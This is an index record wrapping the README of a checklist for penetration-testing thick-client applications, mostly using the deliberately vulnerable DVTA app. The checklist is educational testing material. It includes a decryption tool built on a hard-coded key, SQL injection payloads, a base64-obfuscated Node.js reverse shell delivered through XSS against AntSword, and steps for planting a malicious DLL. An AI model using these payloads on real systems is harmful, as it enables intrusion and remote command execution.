{"id":13539120,"url":"https://github.com/thelsa/cs-checklist","last_synced_at":"2025-04-02T06:30:30.726Z","repository":{"id":54283661,"uuid":"207863838","full_name":"theLSA/CS-checklist","owner":"theLSA","description":"PC客户端（C-S架构）渗透测试checklist / Client side(C-S) penetration checklist","archived":false,"fork":false,"pushed_at":"2021-02-24T17:41:14.000Z","size":31588,"stargazers_count":660,"open_issues_count":0,"forks_count":167,"subscribers_count":22,"default_branch":"master","last_synced_at":"2025-03-13T14:37:24.568Z","etag":null,"topics":["client-side","cs-checklist","penetration"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/theLSA.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-09-11T17:02:19.000Z","updated_at":"2025-01-17T16:15:39.000Z","dependencies_parsed_at":"2022-08-13T11:00:16.845Z","dependency_job_id":null,"html_url":"https://github.com/theLSA/CS-checklist","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/theLSA%2FCS-checklist","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/theLSA%2FCS-checklist/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/theLSA%2FCS-checklist/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/theLSA%2FCS-checklist/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/theLSA","download_url":"https://codeload.github.com/theLSA/CS-checklist/tar.gz/refs/heads/master","host":{"name":"GitHub","url"
:"https://github.com","kind":"github","repositories_count":246767491,"owners_count":20830499,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["client-side","cs-checklist","penetration"],"created_at":"2024-08-01T09:01:20.453Z","updated_at":"2025-04-02T06:30:25.703Z","avatar_url":"https://github.com/theLSA.png","language":null,"funding_links":[],"categories":["\u003ca id=\"8c5a692b5d26527ef346687e047c5c21\"\u003e\u003c/a\u003e收集","\u003ca id=\"e97d183e67fa3f530e7d0e7e8c33ee62\"\u003e\u003c/a\u003e未分类"],"sub_categories":["\u003ca id=\"f110da0bf67359d3abc62b27d717e55e\"\u003e\u003c/a\u003e新添加的"],
"readme":"# **CS-checklist**\n\n<br/>\n\n## **Contents**\n\n   * [<strong>CS-checklist</strong>](#cs-checklist)\n      * [<strong>0x00 Preface</strong>](#0x00-preface)\n      * [<strong>0x01 Overview</strong>](#0x01-overview)\n      * [<strong>0x02 Development Languages</strong>](#0x02-development-languages)\n      * [<strong>0x03 Protocols</strong>](#0x03-protocols)\n      * [<strong>0x04 Databases</strong>](#0x04-databases)\n      * [<strong>0x05 Testing Tools</strong>](#0x05-testing-tools)\n      * [<strong>0x06 Proxy Setup</strong>](#0x06-proxy-setup)\n      * [<strong>0x07 Test Points</strong>](#0x07-test-points)\n         * [<strong>0.</strong> <strong>Information Gathering</strong>](#0-information-gathering)\n         * [<strong>1.</strong> <strong>Reverse Engineering</strong>](#1-reverse-engineering)\n         * [<strong>2.</strong> <strong>Information Disclosure</strong>](#2-information-disclosure)\n         * [<strong>3.</strong> <strong>Network Traffic</strong>](#3-network-traffic)\n         * [<strong>4.</strong> <strong>Other Vulnerabilities</strong>](#4-other-vulnerabilities)\n            * [<strong>Username Enumeration</strong>](#username-enumeration)\n            * [<strong>Brute Force</strong>](#brute-force)\n            * [<strong>Weak Passwords</strong>](#weak-passwords)\n            * [<strong>Cleartext Password Transmission</strong>](#cleartext-password-transmission)\n            * [<strong>SQL Statement Exposure</strong>](#sql-statement-exposure)\n            * [<strong>SQL Injection</strong>](#sql-injection)\n            * [<strong>CSV Injection</strong>](#csv-injection)\n            * [<strong>XSS</strong>](#xss)\n            * [<strong>Command Execution</strong>](#command-execution)\n            * [<strong>DLL Hijacking</strong>](#dll-hijacking)\n            * [<strong>Logic Flaws</strong>](#logic-flaws)\n            * [<strong>Licensing/Authorization Flaws</strong>](#licensingauthorization-flaws)\n            * [<strong>Unauthenticated Access</strong>](#unauthenticated-access)\n            * [<strong>Access Control Bypass</strong>](#access-control-bypass)\n            * [<strong>Overflow</strong>](#overflow)\n      * [<strong>0x08 Tips</strong>](#0x08-tips)\n      * [<strong>0x09 References &amp;&amp; Related Resources</strong>](#0x09-references--related-resources)\n\n<br/>\n\n## **0x00 Preface**\n\nThis project focuses on penetration testing of PC clients in a client-server (C-S) architecture. The checklist combines the author's own testing experience with material collected online. Questions and corrections are welcome, as are contributions of further techniques and case studies.\n\n<br/>\n\n## **0x01 Overview**\n\nA PC client: a feature-rich GUI application in a client-server architecture.\n\n![cs00](https://github.com/theLSA/cs-checklist/raw/master/demo/cs00.png)\n\n//Image source:\n\n[https://resources.infosecinstitute.com/practical-thick-client-application-penetration-testing-using-damn-vulnerable-thick-client-app-part-1/#article](https://resources.infosecinstitute.com/practical-thick-client-application-penetration-testing-using-damn-vulnerable-thick-client-app-part-1/#article)\n\n<br/>\n\n## **0x02 Development Languages**\n\nC# (.NET), Java, Delphi, C, C++ ...\n\n<br/>\n\n## **0x03 Protocols**\n\nTCP, HTTP(S), TDS ...\n\n<br/>\n\n## **0x04 Databases**\n\nOracle, MSSQL, DB2 ...\n\n<br/>\n\n## **0x05 Testing Tools**\n\n//Tool downloads: https://github.com/theLSA/hack-cs-tools\n\ndvta: deliberately vulnerable PC client used as a practice target\n\nida pro: static analysis\n\nollydbg: dynamic analysis (debugger)\n\nCFF Explorer: PE file analysis\n\nPEID: packer detection\n\nexeinfope/studype: PE file analysis\n\nwireshark: traffic inspection\n\ntcpview: view TCP connections\n\necho Mirage: intercept TCP traffic\n\nburpsuite: HTTP(S) interception\n\nproxifier: global proxying of application traffic\n\nprocmon: file and registry monitoring\n\nregshot: registry snapshot comparison\n\nprocess Hacker: process analysis\n\nRegFromApp: registry monitoring\n\nWSExplorer: per-process packet capture tool (from 岁月联盟)\n\nstrings: list the strings contained in a binary\n\n<br/>\n\n.NET (de)compilation:\n\ndotpeek\n\nde4dot\n\ndnspy\n\nilspy\n\nsae\n\nildasm\n\nilasm\n\n<br/>\n\nJava decompilation:\n\njad\n\njd-gui\n\njadx\n\ndex2jar\n\nOnline:<br/>\njavare.cn\n\nwww.javadecompilers.com\n\n<br/>\n\nReflexil: assembly editor (can be used as an ilspy plugin)\n\nVcg: automated code audit tool\n\nBinScope: binary analysis tool\n\n<br/>\n\n## **0x06 Proxy Setup**\n\nMost clients have no proxy configuration of their own, so a global proxy has to be set up. Two ways to do it:\n\n1) IE -> Internet Options -> Connections -> LAN settings.\n\n2) proxifier -> proxy server / proxification rules\n\n//HTTP traffic can then be examined conveniently with burpsuite (set the proxy server to burp's listener address).\n\n![cs24](https://github.com/theLSA/cs-checklist/raw/master/demo/cs24.png)\n\n![cs25](https://github.com/theLSA/cs-checklist/raw/master/demo/cs25.png)\n\n![cs26](https://github.com/theLSA/cs-checklist/raw/master/demo/cs26.png)\n\n<br/>\n\n## **0x07 Test Points**\n\n<br/>\n\n### **0.** **Information Gathering**\n\nCompiler information, development environment/language, protocols used, databases, IP addresses, obfuscation/encryption, whether the binary is packed, etc.\n\n<br/>\n\nCase 0 - Viewing client information (e.g. the build environment) with CFF Explorer\n\ndvta\n\n![cs01](https://github.com/theLSA/cs-checklist/raw/master/demo/cs01.png)\n\n<br/><br/>\n\n### **1.** **Reverse Engineering**\n\nDecompilation, source code leakage, hard-coded keys/passwords, encryption/decryption logic, role-check logic (0 = admin, 1 = normal user), backdoors, etc.\n\n<br/>\n\nCase 0 - Decompile to recover the encryption/decryption logic and write a decryption tool\n\ndvta\n\n![cs02](https://github.com/theLSA/cs-checklist/raw/master/demo/cs02.png)\n\nUsing that logic together with the recovered values\n\n![cs03](https://github.com/theLSA/cs-checklist/raw/master/demo/cs03.png)\n\n**Encrypted Text:** CTsvjZ0jQghXYWbSRcPxpQ==\n\n**AES KEY:** J8gLXc454o5tW2HEF7HahcXPufj9v8k8\n\n**IV:** fq20T0gMnXa6g0l4\n\nWriting the decryption tool:\n\n```csharp\nusing System;\nusing System.Security.Cryptography;\nusing System.Text;\nusing System.Windows.Forms;\n\nnamespace aesdecrypt\n{\n    public partial class aesdecrypt : Form\n    {\n        public aesdecrypt()\n        {\n            InitializeComponent();\n        }\n\n        // Decrypts the ciphertext recovered from the client with its hard-coded\n        // key and IV: AES-256 in CBC mode with PKCS7 padding, as found by decompiling.\n        private void decrypt(object sender, EventArgs e)\n        {\n            String key = \"J8gLXc454o5tW2HEF7HahcXPufj9v8k8\";   // 32 ASCII bytes = 256-bit key\n            String IV = \"fq20T0gMnXa6g0l4\";                   // 16 ASCII bytes = one AES block\n            String encryptedtext = \"CTsvjZ0jQghXYWbSRcPxpQ==\";\n            byte[] encryptedBytes = Convert.FromBase64String(encryptedtext);\n\n            AesCryptoServiceProvider aes = new AesCryptoServiceProvider();\n            aes.BlockSize = 128;\n            aes.KeySize = 256;\n            aes.Key = Encoding.ASCII.GetBytes(key);\n            aes.IV = Encoding.ASCII.GetBytes(IV);\n            aes.Padding = PaddingMode.PKCS7;\n            aes.Mode = CipherMode.CBC;\n\n            ICryptoTransform crypto = aes.CreateDecryptor(aes.Key, aes.IV);\n            byte[] decryptedbytes = crypto.TransformFinalBlock(encryptedBytes, 0, encryptedBytes.Length);\n            String decryptedString = Encoding.ASCII.GetString(decryptedbytes);\n\n            Console.WriteLine(\"\\n\");\n            Console.WriteLine(\"##########Decrypting Database password##########\\n\");\n            Console.WriteLine(\"Decrypted Database password:\" + decryptedString + \"\\n\");\n            Console.WriteLine(\"##########Done##########\\n\");\n        }\n    }\n}\n```\n\n//Decryption code from https://resources.infosecinstitute.com/damn-vulnerable-thick-client-app-part-5/#article\n\n<br/>\n\nCase 1 - Decompile and patch the code logic so that a normal user logs in as admin\n\ndvta\n\n1 - Isadmin\n\n0 - Normaluser\n\nChanging the 1 to 0 makes the check treat the user as admin.\n\n![cs04](https://github.com/theLSA/cs-checklist/raw/master/demo/cs04.png)\n\n![cs05](https://github.com/theLSA/cs-checklist/raw/master/demo/cs05.png)\n\n<br/><br/>\n\n### **2.** **Information Disclosure**\n\nSensitive information in cleartext, sensitive files (e.g. xxx.config in the installation directory).\n\nRegistry: use regshot to compare the registry before and after the client runs (e.g. before and after login).\n\nDevelopment/debug log leakage (e.g. dvta.exe >> log.txt)\n\nUse process hacker to look for cleartext sensitive data in the client's memory (e.g. account credentials/keys).\n\nUse strings to look directly at the client's embedded strings (e.g. IP addresses).\n\nLook for the source code (e.g. on github, gitee, etc.)\n\n<br/>\n\nCase 0 - Sensitive information disclosed in configuration\n\ndvta\n\n![cs06](https://github.com/theLSA/cs-checklist/raw/master/demo/cs06.png)\n\n<br/>\n\nCase 1 - Database credentials leaked in memory\n\ndvta\n\n![cs07](https://github.com/theLSA/cs-checklist/raw/master/demo/cs07.png)\n\n<br/>\n\nCase 2 - Hard-coded FTP credentials in the source code\n\ndvta\n\n![cs08](https://github.com/theLSA/cs-checklist/raw/master/demo/cs08.png)\n\n<br/>\n\nCase 3 - Development/debug log leakage\n\ndvta\n\n![cs09](https://github.com/theLSA/cs-checklist/raw/master/demo/cs09.png)\n\n<br/>\n\nCase 4 - A system that stores the account credentials locally after login\n\n![cs10](https://github.com/theLSA/cs-checklist/raw/master/demo/cs10.png)\n\n//Case source: https://blog.csdn.net/weixin_30685047/article/details/95916065\n\n<br/><br/>\n\n### **3.** **Network Traffic**\n\nwireshark / echo Mirage / burpsuite + nopeproxy / fiddler / charles\n\nCredentials transmitted in cleartext over protocols such as FTP\n\nSQL statements transmitted in cleartext (usable e.g. for constructing injection or access control bypass)\n\n<br/>\n\nCase 0 - Zhengfang (正方) academic affairs system transmits SQL statements in cleartext and returns cleartext data\n\n![cs11](https://github.com/theLSA/cs-checklist/raw/master/demo/cs11.png)\n\n![cs12](https://github.com/theLSA/cs-checklist/raw/master/demo/cs12.png)\n\n//Case source: wooyun\n\n<br/>\n\nCase 1 - A system whose login response packet returns the database credentials\n\n![cs28](https://github.com/theLSA/cs-checklist/raw/master/demo/cs28.png)\n\n<br/><br/>\n\n### **4.** **Other Vulnerabilities**\n\n#### **Username Enumeration**\n\nCase 0\n\n![](https://github.com/theLSA/cs-checklist/raw/master/demo/cs13.png)\n\n![](https://github.com/theLSA/cs-checklist/raw/master/demo/cs14.png)\n\n<br/>\n\n#### **Brute Force**\n\nE.g. the login function.\n\nCase 0\n\n![](https://github.com/theLSA/cs-checklist/raw/master/demo/cs23.png)\n\n<br/>\n\n#### **Weak Passwords**\n\nTry admin / 123456 and the like.\n\n<br/>\n\n#### **Cleartext Password Transmission**\n\n<br/>\n\n#### **SQL Statement Exposure**\n\nCase 0\n\n![cs15](https://github.com/theLSA/cs-checklist/raw/master/demo/cs15.png)\n\n<br/>\n\nCase 1\n\n![cs27](https://github.com/theLSA/cs-checklist/raw/master/demo/cs27.png)\n\n<br/>\n\n#### **SQL Injection**\n\nE.g. at the login form, universal-password payloads\n\nxxx' or 'x'='x\n\nxxx' or 1=1--\n\nIn input fields, try to close the quoting and provoke errors, e.g. ', '), %'), order by 100-- and so on.\n\nExtract data through displayed columns or error messages; the principle is the same as for web injection, with minor differences between databases.\n\n<br/>\n\nCase 0 - Oracle injection\n\n' union select null,null,(select user from dual),null,null,(select banner from sys.v_$version where rownum=1),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from dual--\n\n![cs16](https://github.com/theLSA/cs-checklist/raw/master/demo/cs16.png)\n\n<br/>\n\nCase 1 - MSSQL injection\n\n111') and (select user)>0--\n\n![cs17](https://github.com/theLSA/cs-checklist/raw/master/demo/cs17.png)\n\n<br/>\n\n#### **CSV Injection**\n\nE.g. when exporting to Excel, enter 1+1 and check whether the exported cell shows 2.\n\n<br/>\n\n#### **XSS**\n\nE.g. Electron, NodeWebKit, etc.\n\n<br/>\n\nCase 0 - 中国蚁剑 (AntSword) XSS to RCE\n\nEnvironment: win7 + phpstudy (php5.6.27-nts) + perl + nc + antsword2.0.5\n\nXSS webshell:\n\n```php\n<?php\nheader('HTTP/1.1 500 <img src=# onerror=alertx>');\n```\n\n![cs18](https://github.com/theLSA/cs-checklist/raw/master/demo/cs18.png)\n\nwindows + node.js:\n\nWorks:\n\n```javascript\nvar net = require(\"net\"), sh = require(\"child_process\").exec(\"cmd.exe\");\nvar client = new net.Socket();\nclient.connect(6677, \"127.0.0.1\", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);\nsh.stderr.pipe(client);});\n```\n\n```php\n<?php\nheader(\"HTTP/1.1 500 Not <img src=# onerror='eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCg2Njc3LCAiMTI3LjAuMC4xIiwgZnVuY3Rpb24oKXtjbGllbnQucGlwZShzaC5zdGRpbik7c2guc3Rkb3V0LnBpcGUoY2xpZW50KTsKc2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs=`,`base64`).toString())'>\");\n?>\n```\n\n![cs19](https://github.com/theLSA/cs-checklist/raw/master/demo/cs19.png)\n\nReference\n\nhttps://www.anquanke.com/post/id/176379\n\n<br/>\n\n#### **Command Execution**\n<br/>\nCase 0 - Evernote (印象笔记) Windows client 6.15 local file read and remote command execution\n\n[http://blog.knownsec.com/2018/11/%E5%8D%B0%E8%B1%A1%E7%AC%94%E8%AE%B0-windows-%E5%AE%A2%E6%88%B7%E7%AB%AF-6-15-%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E5%92%8C%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/](http://blog.knownsec.com/2018/11/印象笔记-windows-客户端-6-15-本地文件读取和远程命令执行/)\n\n<br/>\n\nCase 1 - How a command execution bug was found in a cloud vendor's PC client\n\nhttps://www.secpulse.com/archives/53852.html\n\n<br/>\n\nCase 2 - Kingsoft WPS Mail client remote command execution (exploitation technique for Mozilla XUL-based applications)\n\nhttps://shuimugan.com/bug/view?bug_no=193117\n\n<br/>\n\nTest points are the same as for web applications.\n\n<br/>\n\n<br/>\n\n#### **DLL Hijacking**\n\nLinux file search order:\n\n1. Current directory\n\n2. Directories listed in PATH, in order\n\n<br/>\n\nDLL search order used by a program:\n\n//when no absolute path is given\n\n1. The directory the application was loaded from.\n\n2. The current directory.\n\n3. The system directory (C:\\\\Windows\\\\System32\\\\).\n\n4. The 16-bit system directory.\n\n5. The Windows directory.\n\n6. The directories listed in the PATH variable.\n\nA program can therefore end up loading a malicious DLL placed by an attacker.\n\nUse procmon to find the DLLs the program tries to load and watch for NAME NOT FOUND results.\n\nGenerate a malicious DLL with msf, place it where the program looks for the DLL, and run the program to trigger the payload.\n\n<br/>\n\nCase 0 - DLL hijacking\n\ndvta\n\n![cs20](https://github.com/theLSA/cs-checklist/raw/master/demo/cs20.png)\n\n![cs21](https://github.com/theLSA/cs-checklist/raw/master/demo/cs21.png)\n\n<br/>\n\n#### **Logic Flaws**\n\nTest points are the same as for web applications.\n\n<br/>\n\n#### **Licensing/Authorization Flaws**\n\nRegistry key values, forging the response of the licensing/authorization server.\n\nReference\n\nhttps://cloud.tencent.com/developer/article/1430899\n\n<br/>\n\n<br/>\n\n#### **Unauthenticated Access**\n\n<br/>\n\nCase 0 - Arbitrary database operations in the Zhengfang (正方) academic affairs system\n\nKnowing the IP address is enough to take over the database\n\n![cs22](https://github.com/theLSA/cs-checklist/raw/master/demo/cs22.png)\n\n//Case source: wooyun\n\n<br/>\n\n#### **Access Control Bypass**\n\n<br/>\n\n#### **Overflow**\n\n<br/><br/>\n\n## **0x08 Tips**\n\n0. Use procexp -> properties -> tcp/ip to see the network connections the client opens, which quickly identifies the server address.\n\n1. Filter in wireshark directly on the server or database IP or protocol to make the traffic easier to read, e.g.\n\n`ip.addr == 1.2.3.4 && http`\n\n2. If you have database credentials, you can monitor the SQL statements on the database side (e.g. with SQL Server Profiler).\n\n<br/><br/>\n\n## **0x09 References && Related Resources**\n\n[https://resources.infosecinstitute.com](https://resources.infosecinstitute.com/)\n\n",
"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fthelsa%2Fcs-checklist","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fthelsa%2Fcs-checklist","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fthelsa%2Fcs-checklist/lists"}